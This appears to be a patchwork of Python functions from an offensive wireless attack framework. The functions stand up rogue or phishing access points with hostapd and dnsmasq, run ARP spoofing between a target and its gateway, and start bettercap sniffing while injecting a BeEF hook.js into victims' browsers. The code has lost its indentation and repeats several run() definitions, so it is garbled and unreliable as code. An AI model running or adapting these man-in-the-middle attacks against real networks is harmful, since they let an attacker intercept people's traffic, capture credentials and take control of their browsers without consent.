def clientslog():
print('')
i_bssid = ''
i_channel = ''
i_logfile = ''
if i_logfile:
print('\t[*] Using logfile:' + str(i_logfile))
print('\n\t[!] Insert the BSSID and channel for target')
while not i_bssid:
i_bssid = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' +
bc.WARN + 'insert BSSID:' + bc.ENDC + ' ')
while not i_channel:
i_channel = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' +
bc.WARN + 'insert channel:' + bc.ENDC + ' ')
while not i_logfile:
i_logfile = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' +
bc.WARN + 'insert channel:' + bc.ENDC + ' ')
print('\t[*] Starting xterm showing client\'s')
print(
'\t[!] Locate the BSSID for the client connected to the target accesspoint'
)
print('\t[!] Freeze the display in new xterm with "Ctrl+c"')
comm.runCommand2(
cwifi.showConnClients(sop.int_mon, i_bssid, i_channel, i_logfile),
'MONITORING_HANDSHAKE')
print('')
def run():
# Start the AP
command = (CREATEAP_SYM + ' ' + sop.int_mon + ' ' + sop.int_net + ' ' +
sop.name)
if sop.gateway:
command += ' -g ' + sop.gateway
if sop.mode:
command += ' -m ' + sop.mode
if sop.daemon == 'y':
command += ' --daemon'
if sop.logfile:
command += ' >> ' + sop.logfile
print('\n' + '\t' + 'Loading : Create_ap' + '\n\t' + 'Command : ' +
bc.BOLD + command + bc.ENDC + '\n\t' + 'Starting in : 2 seconds' +
'\n\t')
sleep(2)
if sop.daemon == 'y':
os.system(command)
else:
comm.runCommand2(command, 'Create_AP')
def showConnClientsF(interface_mon):
"""Show connected clients to a specified wifi."""
print('')
print('\n\t[!] Insert the BSSID and channel for target')
i_bssid = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN + 'insert BSSID:' + bc.ENDC + ' ')
i_channel = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN + 'insert channel:' + bc.ENDC + ' ')
i_logfile = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN + 'logfile:' + bc.ENDC + ' ')
print('\t[*] Starting xterm showing client\'s')
print('\t[!] Locate the BSSID for the client connected to the target accesspoint')
print('\t[!] Freeze the display in new xterm with "Ctrl+c"')
comm.runCommand2(showConnClients(interface_mon, i_bssid, i_channel, i_logfile), 'Find_CLIENTS')
print('')
def run():
"""The main run function."""
try:
# kill instances of hostapd and dnsmasq
cleanup_system()
iptables_allow_access()
# dnsmasq.conf
dnsconf = ('interface=' + sop.int_mon + '\n')
dnsconf += ('dhcp-range=10.0.0.10,10.0.0.250,12h' + '\n')
dnsconf += ('dhcp-option=3,10.0.0.1' + '\n')
dnsconf += ('dhcp-option=6,10.0.0.1' + '\n')
dnsconf += ('server=8.8.8.8' + '\n')
dnsconf += ('log-queries' + '\n')
dnsconf += ('log-dhcp' + '\n')
dnsconf += ('no-hosts' + '\n')
dnsconf += ('no-resolv' + '\n')
# dnsconf += ('address=/#/' + sop.webphis)
with open('tmp/dnsmasq.conf', 'w') as file:
file.write(dnsconf)
# fakehosts.conf
# fakehosts = '192.168.1.1 nonhttp.com'
# hostapd.conf
hostapd = ('interface=' + sop.int_mon + '\n')
hostapd += ('driver=nl80211' + '\n')
hostapd += ('ssid=' + sop.ssid + '\n')
hostapd += ('channel=' + sop.channel + '\n')
hostapd += ('logger_syslog=-1' + '\n')
hostapd += ('logger_syslog_level=2' + '\n')
with open('tmp/hostapd.conf', 'w') as file:
file.write(hostapd)
comm.runCommand('dnsmasq -C tmp/dnsmasq.conf -d', 'dnsmasq')
comm.runCommand2('hostapd ./tmp/hostapd.conf', 'hostapd')
print(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN +
'phisAP:' + bc.ENDC + ' Press Ctrl+c to exit')
check_connections()
cleanup_system()
cleanup_iptables()
except KeyboardInterrupt:
cleanup_system()
cleanup_iptables()
def clients():
print('')
i_bssid = ''
i_channel = ''
print('\n\t[!] Insert the BSSID and channel for target')
while not i_bssid:
i_bssid = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' +
bc.WARN + 'insert BSSID:' + bc.ENDC + ' ')
while not i_channel:
i_channel = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' +
bc.WARN + 'insert channel:' + bc.ENDC + ' ')
print('\t[*] Starting xterm showing client\'s')
print(
'\t[!] Locate the BSSID for the client connected to the target accesspoint'
)
print('\t[!] Freeze the display in new xterm with "Ctrl+c"')
comm.runCommand2(
cwifi.showConnClients(sop.int_mon, i_bssid, i_channel, ''),
'Find_CLIENTS')
print('')
def run():
print('')
print('\t[*] Turning on ip forwarding')
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
print('\t[*] Starting ARP spoofing.')
print(
'\t[!] Press enter here or "Ctrl+c" in new terminals to clean up. Screwed up? Run command "killall arpspoof"'
)
sleep(2)
arpCom1 = (ARPSPOOF_SYM + ' -t ' + sop.target + ' ' + sop.gateway)
arpCom2 = (ARPSPOOF_SYM + ' -t ' + sop.gateway + ' ' + sop.target)
comm.runCommand(arpCom1)
comm.runCommand2(arpCom2)
kill = input(' -> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN +
'Kill arpspoof:' + bc.ENDC + ' ')
print('\t[*] Stopping ip forwarding')
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
print('\t[*] Stopping ARP spoofing')
os.system('killall arpspoof')
print('')
def run():
"""The main run function."""
# Start the AP
command = (CREATEAP + ' -m bridge -g ' + sop.gateway + ' ' + sop.interface_m + ' ' + sop.interface_n + ' ' + sop.ap_name + ' ')
if sop.args_ap:
command += sop.args_ap + ' '
if sop.ap_log:
command += '>> logs/' + sop.ap_log
print(
'\n' +
'\t' + 'Loading : Create_ap' +
'\n\t' + 'Command : ' + bc.BOLD + command + bc.ENDC +
'\n\t' + 'Starting in : 2 seconds' +
'\n\t'
)
sleep(2)
comm.runCommand(command, 'Create_AP_with_create_ap')
if sop.beef == 'y':
comm.runCommand3('beef', 'Start_beef')
local_ip = comm.getLocalIP(sop.interface_n)
print('\t[!] Check the beef window and insert path to "hook.js"')
print('\t[!] Press enter to select: \'http://' + local_ip[0] + ':3000/hook.js\'')
beef_js_path = input('\t-> ' + bc.WARN + 'wmd' + bc.ENDC + '@' + bc.WARN + 'hook.js path:' + bc.ENDC + ' ')
if not beef_js_path:
beef_js_path = 'http://' + local_ip[0] + ':3000/hook.js'
bettercap_beef_arg = '--proxy-module injectjs --js-url ' + beef_js_path + ' '
# Start bettercap
if getattr(sop, 'interface_n'):
opt_com = '--interface ' + getattr(sop, 'interface_n') + ' '
if getattr(sop, 'gateway'):
opt_com += '--gateway ' + getattr(sop, 'gateway') + ' '
if getattr(sop, 'target'):
opt_com += '--target ' + getattr(sop, 'target') + ' '
if getattr(sop, 'sniffer').lower() == 'y':
opt_com += '--sniffer' + ' '
if getattr(sop, 'proxy').lower() == 'y':
opt_com += '--proxy' + ' '
if getattr(sop, 'sniff_log'):
opt_com += '--log ' + getattr(sop, 'sniff_log') + ' --log-timestamp' + ' '
if beef_js_path:
opt_com += bettercap_beef_arg
if sop.args_sniff:
opt_com += sop.args_sniff
command = (BETTERCAP + ' ' + opt_com)
print(
'\n' +
'\t' + 'Loading : Bettercap' +
'\n\t' + 'Command : ' + bc.BOLD + command + bc.ENDC +
'\n\t' + 'Starting in : 2 seconds' +
'\n\t'
)
sleep(2)
comm.runCommand2(command, 'Bettercap_sniff')
print(
'\n' +
'\t' + 'Status\t : Running' +
'\n\t' + 'Stop\t : Manually close X' +
'\n' +
'\n\t' + 'Type "back" to return to the main menu' +
'\n'
)
print(' -> ' + bc.FAIL + 'wmd' + bc.ENDC + '@' + bc.FAIL + 'APsniff:' + bc.ENDC + ' Module is RUNNING')